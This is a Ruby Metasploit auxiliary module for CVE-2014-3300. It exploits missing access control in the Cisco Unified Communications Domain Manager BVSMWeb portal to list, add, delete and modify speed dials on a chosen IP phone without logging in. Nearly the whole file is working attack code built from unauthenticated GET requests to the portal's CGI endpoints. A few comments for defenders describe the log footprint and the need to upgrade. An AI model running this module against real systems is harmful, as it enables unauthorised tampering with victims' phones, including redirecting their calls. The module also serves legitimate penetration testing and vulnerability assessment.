GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rexml/document'
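# Auxiliary module for CVE-2014-3300: per the description below, the BVSMWeb
# portal of Cisco Unified Communications Domain Manager (before version 10)
# does not enforce access control on its IP phone XML services, so speed dial
# entries of a phone can be read and changed remotely.
#
# What the module puts on the wire: plain HTTP GET requests under TARGETURI to
# speeddials.cgi, phonespeedialadd.cgi and phonespeeddialdelete.cgi, each
# carrying a `device=SEP<MAC>` query parameter. The module performs no login
# step of its own before issuing them.
#
# Notes for defenders:
# - Those three CGI paths combined with a `device=SEP...` parameter are the
#   observable footprint in the portal's web access logs.
#   NOTE(review): legitimate requests presumably originate from the addressed
#   phone itself; confirm for the deployment before alerting on source address.
# - The description places the flaw in releases before version 10, so upgrading
#   is the remediation; consult the vendor advisory for CVE-2014-3300 for the
#   exact fixed builds.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata, the four actions (List is the default) and the
  # options that identify the phone (MAC) and the speed dial entry
  # (NAME, POSITION, TELNO).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
      'Description' => %q{
        The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
        (CDM), before version 10, doesn't implement access control properly, which allows remote
        attackers to modify user information. This module exploits the vulnerability to make
        unauthorized speed dial entity manipulations.
      },
      'Author' => 'fozavci',
      'References' =>
        [
          ['CVE', '2014-3300'],
          ['BID', '68331']
        ],
      'License' => MSF_LICENSE,
      'Actions' =>
        [
          [ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],
          [ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
          [ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],
          [ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
        ],
      'DefaultAction' => 'List'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
        OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
        OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
        OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
        OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
      ])
  end

  # Dispatches to the method that implements the selected action.
  def run
    case action.name.upcase
    when 'MODIFY'
      modify
    when 'DELETE'
      delete
    when 'ADD'
      add
    when 'LIST'
      list
    end
  end

  # Sends one GET request to +uri+ (relative to TARGETURI) with +vars_get+ as
  # the query string and classifies the answer.
  #
  # Returns a two-element array [check_code, response]:
  # - Vulnerable when the response is a 200 whose body mentions "Speed Dial" or
  #   "Speed dial";
  # - Unknown when no response arrived at all, so a timeout or connection
  #   failure is not recorded as "not vulnerable" (a false negative in an
  #   assessment report);
  # - Safe for any other response.
  def send_rcv(uri, vars_get)
    uri = normalize_uri(target_uri.to_s, uri.to_s)
    res = send_request_cgi(
      {
        'uri' => uri,
        'method' => 'GET',
        'vars_get' => vars_get
      })

    if res.nil?
      print_error("No response from target, vulnerability status is unknown")
      return Exploit::CheckCode::Unknown, res
    end

    # The character class is [Dd]; the earlier [D|d] also accepted a literal '|'.
    if res.code == 200 && res.body.to_s.match?(/Speed [Dd]ial/)
      return Exploit::CheckCode::Vulnerable, res
    end

    print_error("Target appears not vulnerable!")
    return Exploit::CheckCode::Safe, res
  end

  # Prints every speed dial found in the XML body of +res+.
  #
  # Each DirectoryEntry contributes one line; its Name element is read as
  # "<position>:<name>" and its Telephone element as the number. The body comes
  # from the remote host and is therefore untrusted: malformed XML and a missing
  # root element are reported instead of raising.
  def parse(res)
    begin
      doc = REXML::Document.new(res.body.to_s)
    rescue REXML::ParseException => e
      print_error("Response is not valid XML: #{e.message}")
      return
    end

    root = doc.root
    entries = root ? root.get_elements('DirectoryEntry') : []

    # Name and Telephone are read per entry so that an entry lacking one of
    # them cannot shift the pairing of the entries that follow it.
    rows = []
    entries.each do |entry|
      label = entry.get_elements('Name').first
      next unless label

      telephone = entry.get_elements('Telephone').first
      rows << [label.text.to_s, telephone&.text.to_s]
    end

    if rows.empty?
      print_status("No Speed Dial detected")
      return
    end

    rows.each do |label, telephone|
      # Limit of 2 keeps a ':' inside the display name from truncating it.
      position, name = label.split(':', 2)
      print_good("Position: #{position}, Name: #{name}, Telephone: #{telephone}")
    end
  end

  # List action: requests the speed dials of the phone identified by MAC and
  # prints them when the service answered as expected.
  def list
    mac = datastore['MAC']

    print_status("Getting Speed Dials of the IP phone")
    vars_get = {
      'device' => "SEP#{mac}"
    }

    status, res = send_rcv('speeddials.cgi', vars_get)
    parse(res) if status == Exploit::CheckCode::Vulnerable
  end

  # Add action: creates the speed dial NAME/TELNO at POSITION on the phone
  # identified by MAC.
  #
  # Returns true when the service confirmed the addition, false otherwise.
  def add
    mac = datastore['MAC']
    name = datastore['NAME']
    position = datastore['POSITION']
    telno = datastore['TELNO']

    print_status("Adding Speed Dial to the IP phone")
    vars_get = {
      'name' => name.to_s,
      'telno' => telno.to_s,
      'device' => "SEP#{mac}",
      'entry' => position.to_s,
      'mac' => mac.to_s
    }
    status, res = send_rcv('phonespeedialadd.cgi', vars_get)

    if status == Exploit::CheckCode::Vulnerable && body_matches?(res, /Added/)
      print_good("Speed Dial #{position} is added successfully")
      true
    elsif body_matches?(res, /exist/)
      print_error("Speed Dial is exist, change the position or choose modify!")
      false
    else
      print_error("Speed Dial couldn't add!")
      false
    end
  end

  # Delete action: removes the speed dial at POSITION from the phone identified
  # by MAC.
  #
  # Returns true when the service confirmed the deletion, false otherwise.
  def delete
    mac = datastore['MAC']
    position = datastore['POSITION']

    print_status("Deleting Speed Dial of the IP phone")

    vars_get = {
      'entry' => position.to_s,
      'device' => "SEP#{mac}"
    }

    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

    if status == Exploit::CheckCode::Vulnerable && body_matches?(res, /Deleted/)
      print_good("Speed Dial #{position} is deleted successfully")
      true
    else
      print_error("Speed Dial is not found!")
      false
    end
  end

  # Modify action: deletes the entry at POSITION and, only if that succeeded,
  # adds it again with the current NAME/TELNO.
  #
  # The two requests are independent, so the change is not atomic: when the
  # delete is confirmed and the add then fails, the original entry is gone.
  def modify
    add if delete
  end

  private

  # True when +res+ is present and its body matches +pattern+; a missing
  # response or body counts as no match.
  def body_matches?(res, pattern)
    !res.nil? && res.body.to_s.match?(pattern)
  end
end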